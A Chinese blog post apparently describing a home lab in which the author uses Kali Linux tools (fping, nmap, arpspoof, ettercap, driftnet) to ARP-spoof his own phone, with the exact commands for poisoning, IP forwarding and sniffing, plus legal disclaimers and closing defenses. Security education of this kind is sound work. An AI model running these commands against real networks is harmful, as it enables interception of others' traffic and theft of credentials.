资讯专栏INFORMATION COLUMN

尝试KALI linux进行arp欺骗

Anshiii / 1002人阅读

摘要:由领先的信息安全培训公司开发,资助和维护。再次声明实验是在攻击主机是我本人的手机,请各位同学一定要遵守法律,做一名有理想有道德有文化有纪律的好青年。以下命令均在终端中运行。请勿用于非法用途与活动。

前言

进行arp欺骗尝试纯属意外的看到了网上的一个视频觉得这个很有意思,所以我也想进行的一个尝试。实验是在攻击主机是我本人的手机,请各位同学一定要遵守法律,做一名有理想、有道德、有文化、有纪律的好青(zhong)年。以下命令均在终端中运行。本篇文章仅限于学习、交流。请勿用于非法用途与活动。

所用的工具

kali linux

nmap

arpspoof

ettercap

driftnet

kali linux简介:Kali Linux是一个基于Debian的Linux发行版,旨在进行高级渗透测试和安全审计。Kali中包含有对各种信息安全任务,如渗透测试,安全性研究,计算机取证和逆向工程面向数百款工具。Kali Linux由领先的信息安全培训公司Offensive Security开发,资助和维护。

为什么选择kali linux:

Kali linux系统包含了600多款渗透测试工具,包括Armitage(图形网络攻击管理工具),Nmap(端口扫描程序),Wireshark(数据包分析程序),John the Ripper 密码破解程序,Aircrack-ng(a 用于渗透测试无线局域网的软件套件),Burp套件和OWASP ZAP Web应用安全扫描器, 这些工具可以用于漏洞分析、密码攻击、无线攻击、逆向工程、ARP欺骗等等,而且这些工具本身就已经内置于系统之中,不需要开发人员开发,直接就可以使用。nmap、arpspoof、ettercap、driftnet这些工具都已安装,开箱即用。

ARP欺骗是什么和其原理

什么是arp欺骗:
ARP欺骗(英语:ARP spoofing)(ARP 的全称是 Address Resolution Protocol,直译过来是 地址解析协议。),又称ARP毒化(ARP poisoning,网上上多译为ARP病毒)或ARP攻击,是针对以太网地址解析协议(ARP)的一种攻击技术,通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC,导致网络不通。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包,且可让网上上特定计算机或所有计算机无法正常连线。最早探讨ARP欺骗的文章是由Yuri Volobuev所写的《ARP与ICMP转向游戏》(ARP and ICMP redirection games)。

arp欺骗的原理:

1.一般情况下,ARP欺骗并不是使网络无法正常通信,而是通过冒充网关或其他主机使得到达网关或主机的流量通过攻击进行转发。通过转发流量可以对流量进行控制和查看,从而控制流量或得到机密信息。

2.ARP欺骗发送arp应答给局域网中其他的主机,其中包含网关的IP地址和进行ARP欺骗的主机MAC地址;并且也发送了ARP应答给网关,其中包含局域网中所有主机的IP地址和进行arp欺骗的主机MAC地址。当局域网中主机和网关收到ARP应答跟新ARP表后,主机和网关之间的流量就需要通过攻击主机进行转发。冒充主机的过程和冒充网关相同。

开始进行arp欺骗

1.首先要知道我们的网关是多少
windows平台用快捷键win+R输入cmd回车 输入ipconfig记下图中最下方的默认网关地址 192.168.2.1.

接着打开kalilinux(我的kali安装在了virtualbox虚拟机)输入:ifping查看做自己的网卡和ip,分别为eth0、192.168.2.207

2 发现我们同wifi下的设备:fping -g -r 0 -s 192.168.2.1/24 | grep alive -g 通过指定开始和结束地址来生成目标列表(例如:./fping –g 192.168.1.0 192.168.1.255)或者一个IP/掩码形式(例如:./fping –g 192.168.2.1/24) -r (当ping失败时,最大重试次数(默认为3次))

3 确定我们要进行arp的目标:nmap -T4 -O 192.168.2.166 192.168.2.207 192.168.2.208 192.168.2.232 -T4是为了让他结束的更快 -O 启用os检测。目标是我的手机努比亚:NX531J-xiyanXY.lan ip:192.168.2.233

4 开始进行arp欺骗

arpspoof -i eth0 (eth0是网卡) 192.168.2.233 (要进行欺骗的ip地址)192.168.2.1 (网关地址)


再打开一个终端输入(将网关地址和被攻击的ip地址调换位置进行)进行双向欺骗:

arpspoof -i eth0 (eth0是网卡) 192.168.2.1 (网关地址) 192.168.2.233(要进行欺骗的ip地址)

此时手机应该就连不上网了

5 进行端口转发:echo 1 > /porc/sys/net/ipv4/ip_forward 此命令为临时开启端口转发。

cat /porc/sys/net/ipv4/ip_forward 这条是查看否成功开启转发。


开启以后手机应该就可以上网了

6 进行图片嗅探:dritnet -i eth0

7进行密码嗅探仅限http协议的网站ettercap -Tq -i eth0
但是密码嗅探失败了

总结

经此看出我们的信息安全多么的不安全。且经过高手的升级也已经有了嗅探https协议的方法了。arp欺骗已经是很古老的方法了放在现在却依然有可以获得我们隐私的地方。防止被arp欺骗的方法有很多例如现在很多的路由器都支持防御arp欺骗。安装对ARP欺骗工具的防护软件采用静态的ARP缓存,在各主机上绑定网关的IP和MAC地址。在网关上绑定各主机的IP和MAC地址。

再次声明:实验是在攻击主机是我本人的手机,请各位同学一定要遵守法律,做一名有理想、有道德、有文化、有纪律的好青(zhong)年。以下命令均在终端中运行。本篇文章仅限于学习、交流。请勿用于非法用途与活动。

文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。

转载请注明本文地址:https://www.ucloud.cn/yun/63485.html

相关文章

  • kaliarp-scan

    摘要:是一款自带的一款轻量扫描工具,该工具会自动解析地址,得到对应硬件厂商。通过,在局域网可以很容易构成一个欺骗,从而得到有用数据信息。对于目标主机可以指定为地址或主机名。扫描到主机后,再配合使用,更加方便。 Arp-scan 是一款kali自带的一款轻量ARP扫描工具,该工具会自动解析M...

    不知名网友 评论0 收藏0
  • 安全漏洞与网络攻击

    摘要:目录一安全漏洞及产生原因一安全漏洞及产生原因安全漏洞概念安全漏洞概念漏洞产生的技术原因漏洞产生的技术原因漏洞产生的经济原因漏洞产生的经济原因二信息收集与分析二信息收集与分析攻击的过程攻击的过程信息收集攻击的前 目录 一、安全漏洞及产生原因 1. 安全漏洞概念 2. 漏洞产生的技术原因 3. ...

    Prasanta 评论0 收藏0
  • kali安装xerosploit最新教程【解决一切疑难杂症】

    摘要:渗透测试工具简介是一个渗透测试工具包,是执行中间人攻击以进行测试。它带来了各种模块,也可以实现高效的攻击,还可以进行拒绝服务攻击和端口扫描。感谢你的耐心浏览,该休息一下了哟。 ...

    phodal 评论0 收藏0
  • 内网域渗透分析(实战总结)

    摘要:搭建代理添加一个代理建立了一条由攻击机到服务器的通道,的服务端在攻击机,也是反向代理复制代理链接到中让所有模块的流量都通过此代理走。全局设置允许反向代理,通过反弹,建立双向通道。 ...

    FuisonDesign 评论0 收藏0
  • Metasploit 信息收集模块-主机发现、端口扫描、FTP信息收集

    摘要:简介这次介绍一下的主机发现端口扫描密码嗅探的模块。二端口扫描用到的模块与命令端口扫描查看需要设置的参数设置靶机开始攻击开始测试例扫描端口扫描额,不是我懒这个跟主机发现是,一样的步骤只是,用的模块不同。 简介: 这次介绍一下Metasploit的主机发现、端口扫描、密码嗅探的模块。use au...

    史占广 评论0 收藏0

发表评论

0条评论

Anshiii

|高级讲师

TA的文章

阅读更多
最新活动
阅读需要支付1元查看
<